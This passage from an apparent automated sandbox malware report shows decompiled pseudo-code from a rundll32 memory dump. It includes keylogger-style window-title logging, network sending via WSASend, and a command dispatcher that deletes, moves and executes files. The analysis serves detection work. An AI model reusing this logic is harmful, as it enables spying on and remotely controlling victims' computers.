                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 046418DA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEnumOpen$InfoQuery
                                                            • String ID:
                                                            • API String ID: 396531129-0
                                                            • Opcode ID: 4d9c2a3a5bc7146d4deec980226e487af336de20d680231ee1ffc1afb07905b7
                                                            • Instruction ID: e2bf349fd15f464d1eac205619fd260032e41d97c400636a2ddf5b1bc7595d28
                                                            • Opcode Fuzzy Hash: 4d9c2a3a5bc7146d4deec980226e487af336de20d680231ee1ffc1afb07905b7
                                                            • Instruction Fuzzy Hash: F3714CB194122DABDF209F64DC8CBDAB7B8EF54304F100199E509A7251EB70AF848F94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E0466ED7F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                            				signed int _v8;
                                                            				signed char _v15;
                                                            				char _v16;
                                                            				void _v24;
                                                            				short _v28;
                                                            				char _v31;
                                                            				void _v32;
                                                            				long _v36;
                                                            				intOrPtr _v40;
                                                            				void* _v44;
                                                            				signed int _v48;
                                                            				signed char* _v52;
                                                            				long _v56;
                                                            				int _v60;
                                                            				signed int _t78;
                                                            				signed int _t80;
                                                            				int _t86;
                                                            				void* _t94;
                                                            				long _t97;
                                                            				void _t105;
                                                            				void* _t112;
                                                            				signed int _t116;
                                                            				signed int _t118;
                                                            				signed char _t123;
                                                            				signed char _t128;
                                                            				intOrPtr _t129;
                                                            				signed int _t131;
                                                            				signed char* _t133;
                                                            				intOrPtr* _t135;
                                                            				signed int _t136;
                                                            				void* _t137;
                                                            
                                                            				_t78 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t78 ^ _t136;
                                                            				_t80 = _a8;
                                                            				_t118 = _t80 >> 6;
                                                            				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                            				_t133 = _a12;
                                                            				_v52 = _t133;
                                                            				_v48 = _t118;
                                                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4687680 + _t118 * 4)) + _t116 + 0x18));
                                                            				_v40 = _a16 + _t133;
                                                            				_t86 = GetConsoleCP();
                                                            				_t135 = _a4;
                                                            				_v60 = _t86;
                                                            				 *_t135 = 0;
                                                            				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                            				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                            				while(_t133 < _v40) {
                                                            					_v28 = 0;
                                                            					_v31 =  *_t133;
                                                            					_t129 =  *((intOrPtr*)(0x4687680 + _v48 * 4));
                                                            					_t123 =  *(_t129 + _t116 + 0x2d);
                                                            					if((_t123 & 0x00000004) == 0) {
                                                            						if(( *(E0466982A(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                            							_push(1);
                                                            							_push(_t133);
                                                            							goto L8;
                                                            						} else {
                                                            							if(_t133 >= _v40) {
                                                            								_t131 = _v48;
                                                            								 *((char*)( *((intOrPtr*)(0x4687680 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                            								 *( *((intOrPtr*)(0x4687680 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x4687680 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                            								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                            							} else {
                                                            								_t112 = E0466AF6D( &_v28, _t133, 2);
                                                            								_t137 = _t137 + 0xc;
                                                            								if(_t112 != 0xffffffff) {
                                                            									_t133 =  &(_t133[1]);
                                                            									goto L9;
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_t128 = _t123 & 0x000000fb;
                                                            						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                            						_push(2);
                                                            						_v15 = _t128;
                                                            						 *(_t129 + _t116 + 0x2d) = _t128;
                                                            						_push( &_v16);
                                                            						L8:
                                                            						_push( &_v28);
                                                            						_t94 = E0466AF6D();
                                                            						_t137 = _t137 + 0xc;
                                                            						if(_t94 != 0xffffffff) {
                                                            							L9:
                                                            							_t133 =  &(_t133[1]);
                                                            							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                            							_v56 = _t97;
                                                            							if(_t97 != 0) {
                                                            								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                            									L19:
                                                            									 *_t135 = GetLastError();
                                                            								} else {
                                                            									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                            									if(_v36 >= _v56) {
                                                            										if(_v31 != 0xa) {
                                                            											goto L16;
                                                            										} else {
                                                            											_t105 = 0xd;
                                                            											_v32 = _t105;
                                                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                            												goto L19;
                                                            											} else {
                                                            												if(_v36 >= 1) {
                                                            													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                            													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                            													goto L16;
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					goto L20;
                                                            					L16:
                                                            				}
                                                            				L20:
                                                            				return E04655AFE(_v8 ^ _t136);
                                                            			}


































                                                            0x0466ed87
                                                            0x0466ed8e
                                                            0x0466ed91
                                                            0x0466ed99
                                                            0x0466ed9d
                                                            0x0466eda9
                                                            0x0466edac
                                                            0x0466edaf
                                                            0x0466edb6
                                                            0x0466edbe
                                                            0x0466edc1
                                                            0x0466edc7
                                                            0x0466edcd
                                                            0x0466edd2
                                                            0x0466edd4
                                                            0x0466edd7
                                                            0x0466eddc
                                                            0x0466ede6
                                                            0x0466eded
                                                            0x0466edf0
                                                            0x0466edf7
                                                            0x0466edfe
                                                            0x0466ee2a
                                                            0x0466ee50
                                                            0x0466ee52
                                                            0x00000000
                                                            0x0466ee2c
                                                            0x0466ee2f
                                                            0x0466eef6
                                                            0x0466ef02
                                                            0x0466ef0d
                                                            0x0466ef12
                                                            0x0466ee35
                                                            0x0466ee3c
                                                            0x0466ee41
                                                            0x0466ee47
                                                            0x0466ee4d
                                                            0x00000000
                                                            0x0466ee4d
                                                            0x0466ee47
                                                            0x0466ee2f
                                                            0x0466ee00
                                                            0x0466ee04
                                                            0x0466ee07
                                                            0x0466ee0d
                                                            0x0466ee0f
                                                            0x0466ee12
                                                            0x0466ee16
                                                            0x0466ee53
                                                            0x0466ee56
                                                            0x0466ee57
                                                            0x0466ee5c
                                                            0x0466ee62
                                                            0x0466ee68
                                                            0x0466ee77
                                                            0x0466ee7d
                                                            0x0466ee83
                                                            0x0466ee88
                                                            0x0466eea4
                                                            0x0466ef17
                                                            0x0466ef1d
                                                            0x0466eea6
                                                            0x0466eeae
                                                            0x0466eeb7
                                                            0x0466eebd
                                                            0x00000000
                                                            0x0466eebf
                                                            0x0466eec1
                                                            0x0466eec4
                                                            0x0466eedd
                                                            0x00000000
                                                            0x0466eedf
                                                            0x0466eee3
                                                            0x0466eee5
                                                            0x0466eee8
                                                            0x00000000
                                                            0x0466eee8
                                                            0x0466eee3
                                                            0x0466eedd
                                                            0x0466eebd
                                                            0x0466eeb7
                                                            0x0466eea4
                                                            0x0466ee88
                                                            0x0466ee62
                                                            0x00000000
                                                            0x0466eeeb
                                                            0x0466eeeb
                                                            0x0466ef1f
                                                            0x0466ef31

                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0466F4F4,?,00000000,?,00000000,00000000), ref: 0466EDC1
                                                            • __fassign.LIBCMT ref: 0466EE3C
                                                            • __fassign.LIBCMT ref: 0466EE57
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0466EE7D
                                                            • WriteFile.KERNEL32(?,?,00000000,0466F4F4,00000000,?,?,?,?,?,?,?,?,?,0466F4F4,?), ref: 0466EE9C
                                                            • WriteFile.KERNEL32(?,?,00000001,0466F4F4,00000000,?,?,?,?,?,?,?,?,?,0466F4F4,?), ref: 0466EED5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: d03760983fa6d2db3dbaac586048664dc31cefe3ec5ea6e31d3825bcf03f14bb
                                                            • Instruction ID: 147fe1d146b4ba563d99a045d9809b231bd537ec8a175957a22be83551aa13f2
                                                            • Opcode Fuzzy Hash: d03760983fa6d2db3dbaac586048664dc31cefe3ec5ea6e31d3825bcf03f14bb
                                                            • Instruction Fuzzy Hash: DA51B6B5A002499FDB14CFA8D845AEEBBF4EF09310F14455EE556E7381F731A941CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E04654580(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                            				signed int _v8;
                                                            				long _v12;
                                                            				void* _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				void** _v32;
                                                            				signed int _t53;
                                                            				intOrPtr _t56;
                                                            				long _t61;
                                                            				long* _t68;
                                                            				long _t71;
                                                            				long _t87;
                                                            				intOrPtr _t90;
                                                            				void** _t100;
                                                            				void* _t101;
                                                            				long* _t104;
                                                            				void* _t106;
                                                            				void* _t108;
                                                            				signed int _t109;
                                                            				void* _t110;
                                                            
                                                            				_t90 = __ecx;
                                                            				_t53 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t53 ^ _t109;
                                                            				_v20 = _a8;
                                                            				_t56 = _a12;
                                                            				_v24 = __ecx;
                                                            				_v28 = _a4;
                                                            				if(_t56 <= 0) {
                                                            					return E04655AFE(_v8 ^ _t109);
                                                            				} else {
                                                            					_t100 = __ecx + 0x94;
                                                            					_v32 = _t100;
                                                            					do {
                                                            						_v16 = 0;
                                                            						_t87 =  <  ? _t56 :  *((intOrPtr*)(_t90 + 0x18));
                                                            						_v12 = _t87;
                                                            						if(E0464C880( &(_t100[7]),  &_v16) != 0) {
                                                            							_t101 = _v16;
                                                            						} else {
                                                            							_t108 = _t100[4];
                                                            							_t101 = RtlAllocateHeap( *_t100, 0, _t108 + 0x38);
                                                            							_v16 = _t101;
                                                            							 *(_t101 + 0x14) = _v32;
                                                            							_t20 = _t101 + 0x38; // 0x38
                                                            							 *(_t101 + 0x24) = _t108;
                                                            							 *((intOrPtr*)(_t101 + 0x20)) = _t20;
                                                            						}
                                                            						_t24 = _t101 + 0x1c; // 0x1c
                                                            						_t104 = _t24;
                                                            						asm("xorps xmm0, xmm0");
                                                            						asm("movups [edi], xmm0");
                                                            						 *(_t101 + 0x10) = 0;
                                                            						 *_t104 = 0;
                                                            						if(_t87 >= 0) {
                                                            							_t61 = _v12;
                                                            						} else {
                                                            							_t61 =  *(_v24 + 0x18);
                                                            						}
                                                            						 *_t104 = _t61;
                                                            						E0465E060( *((intOrPtr*)(_t101 + 0x20)), _v20, _t87);
                                                            						_t110 = _t110 + 0xc;
                                                            						InterlockedExchangeAdd(_v28 + 0x40, _t87);
                                                            						 *((intOrPtr*)(_t101 + 0x34)) =  *((intOrPtr*)(_v28 + 0x88));
                                                            						_t68 =  &_v12;
                                                            						_v12 = 0;
                                                            						 *((intOrPtr*)(_t101 + 0x18)) = 3;
                                                            						 *(_t101 + 0x28) = 2;
                                                            						__imp__WSASend( *((intOrPtr*)(_t101 + 0x34)), _t104, 1, _t68, 0, _t101, 0);
                                                            						if(_t68 != 0xffffffff) {
                                                            							_t68 = 0;
                                                            						} else {
                                                            							__imp__#111();
                                                            						}
                                                            						_t106 =  !=  ? _t68 : 0;
                                                            						_t40 = _t101 + 0x28; // 0x28
                                                            						if(InterlockedDecrement(_t40) == 0 || _t106 != 0) {
                                                            							_t71 = E0464C930(_v24 + 0xb0, _t101);
                                                            							if(_t71 == 0) {
                                                            								HeapFree( *( *(_t101 + 0x14)), _t71, _t101);
                                                            							}
                                                            							if(_t106 != 0) {
                                                            								InterlockedExchangeAdd(_v28 + 0x40,  ~_t87);
                                                            							} else {
                                                            								goto L16;
                                                            							}
                                                            						} else {
                                                            							goto L16;
                                                            						}
                                                            						break;
                                                            						L16:
                                                            						_t90 = _v24;
                                                            						_t56 = _a12 - _t87;
                                                            						_v20 = _v20 + _t87;
                                                            						_a12 = _t56;
                                                            						_t100 = _t90 + 0x94;
                                                            					} while (_t56 > 0);
                                                            					return E04655AFE(_v8 ^ _t109);
                                                            				}
                                                            			}
























                                                            0x04654580
                                                            0x04654586
                                                            0x0465458d
                                                            0x04654596
                                                            0x04654599
                                                            0x0465459c
                                                            0x0465459f
                                                            0x046545a4
                                                            0x0465471d
                                                            0x046545aa
                                                            0x046545ab
                                                            0x046545b2
                                                            0x046545b6
                                                            0x046545be
                                                            0x046545c5
                                                            0x046545cc
                                                            0x046545d6
                                                            0x046545ff
                                                            0x046545d8
                                                            0x046545d8
                                                            0x046545e9
                                                            0x046545ee
                                                            0x046545f1
                                                            0x046545f4
                                                            0x046545f7
                                                            0x046545fa
                                                            0x046545fa
                                                            0x04654602
                                                            0x04654602
                                                            0x04654605
                                                            0x04654608
                                                            0x0465460b
                                                            0x04654612
                                                            0x0465461a
                                                            0x04654624
                                                            0x0465461c
                                                            0x0465461f
                                                            0x0465461f
                                                            0x0465462b
                                                            0x04654630
                                                            0x04654638
                                                            0x04654640
                                                            0x04654654
                                                            0x04654657
                                                            0x04654661
                                                            0x04654668
                                                            0x0465466f
                                                            0x04654676
                                                            0x0465467f
                                                            0x04654689
                                                            0x04654681
                                                            0x04654681
                                                            0x04654681
                                                            0x04654692
                                                            0x04654695
                                                            0x046546a1
                                                            0x046546b1
                                                            0x046546b8
                                                            0x046546c1
                                                            0x046546c1
                                                            0x046546c9
                                                            0x04654706
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046546cb
                                                            0x046546ce
                                                            0x046546d1
                                                            0x046546d3
                                                            0x046546d6
                                                            0x046546d9
                                                            0x046546df
                                                            0x046546f9
                                                            0x046546f9

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 046545E3
                                                            • InterlockedExchangeAdd.KERNEL32(?,?), ref: 04654640
                                                            • WSASend.WS2_32(?,0000001C,00000001,?), ref: 04654676
                                                            • WSAGetLastError.WS2_32 ref: 04654681
                                                            • InterlockedDecrement.KERNEL32(00000028), ref: 04654699
                                                            • HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 046546C1
                                                            • InterlockedExchangeAdd.KERNEL32(-0000003D,?), ref: 04654706
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$ExchangeHeap$AllocateDecrementErrorFreeLastSend
                                                            • String ID:
                                                            • API String ID: 319775435-0
                                                            • Opcode ID: 9f56574a94add06e1a130ebfc2662200e8fff0f305bba5cd194c8159aabaf897
                                                            • Instruction ID: 7a7ec9b6707cbd830d3f564d6c45a5b0a4e081afaf7afad0875cd41f15a95dc7
                                                            • Opcode Fuzzy Hash: 9f56574a94add06e1a130ebfc2662200e8fff0f305bba5cd194c8159aabaf897
                                                            • Instruction Fuzzy Hash: E8513D71A0020AAFDB10DFA4C984BAAB7F8FF58304F114269E905D7650EB71F995CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0463B2E0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v532;
                                                            				short _v2580;
                                                            				struct _SYSTEMTIME _v2596;
                                                            				struct HWND__* _v2600;
                                                            				signed int _t35;
                                                            				intOrPtr _t38;
                                                            				struct HWND__* _t39;
                                                            				signed int _t43;
                                                            				intOrPtr _t45;
                                                            				intOrPtr* _t50;
                                                            				signed int _t67;
                                                            				signed int _t68;
                                                            				WCHAR* _t70;
                                                            				void* _t74;
                                                            				signed short* _t76;
                                                            				intOrPtr* _t77;
                                                            				intOrPtr* _t82;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            				void* _t86;
                                                            				intOrPtr _t87;
                                                            				intOrPtr* _t89;
                                                            				intOrPtr* _t91;
                                                            				signed int _t93;
                                                            				signed int _t94;
                                                            				void* _t95;
                                                            
                                                            				_t35 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t35 ^ _t94;
                                                            				_t70 = __ecx;
                                                            				if(__ecx == 0) {
                                                            					L24:
                                                            					return E04655AFE(_v8 ^ _t94);
                                                            				}
                                                            				_t91 = __ecx;
                                                            				_t74 = __ecx + 2;
                                                            				do {
                                                            					_t38 =  *_t91;
                                                            					_t91 = _t91 + 2;
                                                            				} while (_t38 != 0);
                                                            				_t93 = _t91 - _t74 >> 1;
                                                            				if(_t93 < 1) {
                                                            					goto L24;
                                                            				}
                                                            				_t39 = GetForegroundWindow();
                                                            				_v2600 = _t39;
                                                            				GetWindowTextW(_t39,  &_v532, 0x101);
                                                            				_t89 =  *0x4687adc; // 0x0
                                                            				if(_v2600 !=  *(_t89 + 8)) {
                                                            					L13:
                                                            					_t76 =  &_v532;
                                                            					_t12 = _t89 + 0xc; // 0xc
                                                            					_t84 = _t12 - _t76;
                                                            					asm("o16 nop [eax+eax]");
                                                            					do {
                                                            						_t43 =  *_t76 & 0x0000ffff;
                                                            						_t76 =  &(_t76[1]);
                                                            						 *(_t84 + _t76 - 2) = _t43;
                                                            					} while (_t43 != 0);
                                                            					_t77 =  &_v532;
                                                            					 *(_t89 + 8) = _v2600;
                                                            					_t85 = _t77 + 2;
                                                            					do {
                                                            						_t45 =  *_t77;
                                                            						_t77 = _t77 + 2;
                                                            					} while (_t45 != 0);
                                                            					if(_t77 != _t85) {
                                                            						E0465DEA0(_t89,  &_v2580, 0, 0x800);
                                                            						GetLocalTime( &_v2596);
                                                            						wsprintfW( &_v2580, L"\r\n\r\n[Title:%s]\r\n[Time:]%d-%d-%d  %d:%d:%d\r\n[Content:]",  &_v532, _v2596.wYear & 0x0000ffff, _v2596.wMonth & 0x0000ffff, _v2596.wDay & 0x0000ffff, _v2596.wHour & 0x0000ffff, _v2596.wMinute & 0x0000ffff, _v2596.wSecond & 0x0000ffff);
                                                            						_t95 = _t95 + 0x30;
                                                            						E0463B2E0(_t70,  &_v2580, _t89, _t93);
                                                            						_t89 =  *0x4687adc; // 0x0
                                                            					}
                                                            					L19:
                                                            					if( *((char*)(_t89 + 0x20c)) != 0) {
                                                            						E0463B1A0(_t70);
                                                            						_t89 =  *0x4687adc; // 0x0
                                                            					}
                                                            					if( *_t89 + _t93 > 0x400) {
                                                            						_t32 = _t89 + 0x416; // 0x416
                                                            						E0465DEA0(_t89, _t32, 0, 0x800);
                                                            						 *_t89 = 0;
                                                            					}
                                                            					_t33 = _t89 + 0x416; // 0x416
                                                            					lstrcatW(_t33, _t70);
                                                            					_t50 =  *0x4687adc; // 0x0
                                                            					 *_t50 =  *_t50 + _t93;
                                                            					goto L24;
                                                            				}
                                                            				_t82 =  &_v532;
                                                            				_t8 = _t89 + 0xc; // 0xc
                                                            				_t67 = _t8;
                                                            				while(1) {
                                                            					_t86 =  *_t67;
                                                            					if(_t86 !=  *_t82) {
                                                            						break;
                                                            					}
                                                            					if(_t86 == 0) {
                                                            						L10:
                                                            						_t68 = 0;
                                                            						L12:
                                                            						if(_t68 == 0) {
                                                            							goto L19;
                                                            						}
                                                            						goto L13;
                                                            					}
                                                            					_t87 =  *((intOrPtr*)(_t67 + 2));
                                                            					if(_t87 !=  *((intOrPtr*)(_t82 + 2))) {
                                                            						break;
                                                            					}
                                                            					_t67 = _t67 + 4;
                                                            					_t82 = _t82 + 4;
                                                            					if(_t87 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L10;
                                                            				}
                                                            				asm("sbb eax, eax");
                                                            				_t68 = _t67 | 0x00000001;
                                                            				goto L12;
                                                            			}






























                                                            0x0463b2e9
                                                            0x0463b2f0
                                                            0x0463b2f4
                                                            0x0463b2fa
                                                            0x0463b4a9
                                                            0x0463b4b9
                                                            0x0463b4b9
                                                            0x0463b300
                                                            0x0463b302
                                                            0x0463b305
                                                            0x0463b305
                                                            0x0463b308
                                                            0x0463b30b
                                                            0x0463b312
                                                            0x0463b317
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b31d
                                                            0x0463b32e
                                                            0x0463b336
                                                            0x0463b33c
                                                            0x0463b34b
                                                            0x0463b389
                                                            0x0463b389
                                                            0x0463b38f
                                                            0x0463b394
                                                            0x0463b396
                                                            0x0463b3a0
                                                            0x0463b3a0
                                                            0x0463b3a3
                                                            0x0463b3a6
                                                            0x0463b3ab
                                                            0x0463b3b6
                                                            0x0463b3bc
                                                            0x0463b3bf
                                                            0x0463b3c2
                                                            0x0463b3c2
                                                            0x0463b3c5
                                                            0x0463b3c8
                                                            0x0463b3d1
                                                            0x0463b3e5
                                                            0x0463b3f4
                                                            0x0463b43d
                                                            0x0463b443
                                                            0x0463b44c
                                                            0x0463b451
                                                            0x0463b451
                                                            0x0463b457
                                                            0x0463b45e
                                                            0x0463b462
                                                            0x0463b467
                                                            0x0463b467
                                                            0x0463b476
                                                            0x0463b47d
                                                            0x0463b486
                                                            0x0463b48e
                                                            0x0463b48e
                                                            0x0463b495
                                                            0x0463b49c
                                                            0x0463b4a2
                                                            0x0463b4a7
                                                            0x00000000
                                                            0x0463b4a7
                                                            0x0463b34d
                                                            0x0463b353
                                                            0x0463b353
                                                            0x0463b356
                                                            0x0463b356
                                                            0x0463b35c
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b361
                                                            0x0463b378
                                                            0x0463b378
                                                            0x0463b381
                                                            0x0463b383
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b383
                                                            0x0463b363
                                                            0x0463b36b
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b36d
                                                            0x0463b370
                                                            0x0463b376
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b376
                                                            0x0463b37c
                                                            0x0463b37e
                                                            0x00000000

                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 0463B31D
                                                            • GetWindowTextW.USER32(00000000,?,00000101), ref: 0463B336
                                                            • GetLocalTime.KERNEL32(?), ref: 0463B3F4
                                                            • wsprintfW.USER32 ref: 0463B43D
                                                            • lstrcatW.KERNEL32(00000416), ref: 0463B49C
                                                            Strings
                                                            • [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:], xrefs: 0463B437
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
                                                            • String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
                                                            • API String ID: 67575802-2837871436
                                                            • Opcode ID: 96388d20ec1beff1d04b947a2bfaea70c68dd061446d779bcbb56210f50846e7
                                                            • Instruction ID: 6e95e2797067fab24f0f9965359b14dc47625eed70973f97feae61e1c6fadb37
                                                            • Opcode Fuzzy Hash: 96388d20ec1beff1d04b947a2bfaea70c68dd061446d779bcbb56210f50846e7
                                                            • Instruction Fuzzy Hash: F951E475A002199BDB24DF64CC84BF6B3B8FF18705F4445A9E909E3241F775BA84CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E04634130(void* __ebx, void* __ecx, signed char* _a4, intOrPtr _a8) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				signed int _t26;
                                                            
                                                            				_t26 = ( *_a4 & 0x000000ff) + 0xfffffffb;
                                                            				if(_t26 > 0xe) {
                                                            					L19:
                                                            					return _t26;
                                                            				} else {
                                                            					switch( *((intOrPtr*)(_t26 * 4 +  &M04634268))) {
                                                            						case 0:
                                                            							return E04634C20(__ebx, __ecx, __ecx, _t36, _t31 + 1);
                                                            							goto L20;
                                                            						case 1:
                                                            							__eax = __edx + 1;
                                                            							__eax = E046352C0(__ebx, __ecx, __edi, __edx + 1);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 2:
                                                            							__eax = __edx + 1;
                                                            							__eax = E046356D0(__ebx, __ecx, __edi, __esi, __edx + 1);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 3:
                                                            							_a8 = _a8 - 1;
                                                            							__eflags = _a8 - 1;
                                                            							__eax = __edx + 1;
                                                            							__eax = E04635910(__ebx, __ecx, __edi, __esi, __edx + 1, __edx + 1);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 4:
                                                            							goto L19;
                                                            						case 5:
                                                            							__eax = __edx + 1;
                                                            							__eax = E046350B0(__ecx, __edx + 1);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 6:
                                                            							__eax = E046356A0(__ecx);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 7:
                                                            							__edx + 1 = DeleteFileW(__edx + 1);
                                                            							goto L4;
                                                            						case 8:
                                                            							__edx + 1 = E04634E30(__ebx, __ecx, __edi, __esi, __edx + 1);
                                                            							L4:
                                                            							_v8 = 0x6d;
                                                            							goto L5;
                                                            						case 9:
                                                            							__eax =  *(__edx + 1);
                                                            							 *(__edi + 0x14) =  *(__edx + 1);
                                                            							__eax = E046357F0(__ebx, __ecx, __edi, __esi);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 0xa:
                                                            							__edx + 1 = E04634670(__ecx, __eflags, __edx + 1);
                                                            							_v12 = 0x70;
                                                            							goto L5;
                                                            						case 0xb:
                                                            							__esi = __edx + 1;
                                                            							__eax = lstrlenW(__esi);
                                                            							__eax =  &(__eax[0]);
                                                            							__eax = MoveFileW(__esi, __eax);
                                                            							_v8 = 0x72;
                                                            							L5:
                                                            							_push(__ecx);
                                                            							__ecx =  *((intOrPtr*)(__edi + 4));
                                                            							__eax =  &_v8;
                                                            							_push(0x3f);
                                                            							_push(1);
                                                            							_push( &_v8);
                                                            							__eax = E04631C60( *((intOrPtr*)(__edi + 4)));
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 0xc:
                                                            							_push(5);
                                                            							goto L16;
                                                            						case 0xd:
                                                            							_push(0);
                                                            							L16:
                                                            							__eax = __edx + 1;
                                                            							__eax = ShellExecuteW(0, L"open", __edx + 1, 0, 0, ??);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 0xe:
                                                            							__edx + 1 = E046345E0(__ecx, __edx + 1);
                                                            							goto L19;
                                                            					}
                                                            				}
                                                            				L20:
                                                            			}






                                                            0x04634140
                                                            0x04634149
                                                            0x0463425d
                                                            0x04634262
                                                            0x0463414f
                                                            0x0463414f
                                                            0x00000000
                                                            0x04634164
                                                            0x00000000
                                                            0x00000000
                                                            0x0463419b
                                                            0x0463419f
                                                            0x046341a4
                                                            0x046341a5
                                                            0x046341a9
                                                            0x00000000
                                                            0x00000000
                                                            0x0463420a
                                                            0x0463420e
                                                            0x04634213
                                                            0x04634214
                                                            0x04634218
                                                            0x00000000
                                                            0x00000000
                                                            0x0463421e
                                                            0x0463421e
                                                            0x04634220
                                                            0x04634224
                                                            0x04634229
                                                            0x0463422a
                                                            0x0463422e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046341ac
                                                            0x046341b0
                                                            0x046341b5
                                                            0x046341b6
                                                            0x046341ba
                                                            0x00000000
                                                            0x00000000
                                                            0x046341ea
                                                            0x046341ef
                                                            0x046341f0
                                                            0x046341f4
                                                            0x00000000
                                                            0x00000000
                                                            0x0463416b
                                                            0x00000000
                                                            0x00000000
                                                            0x04634194
                                                            0x04634171
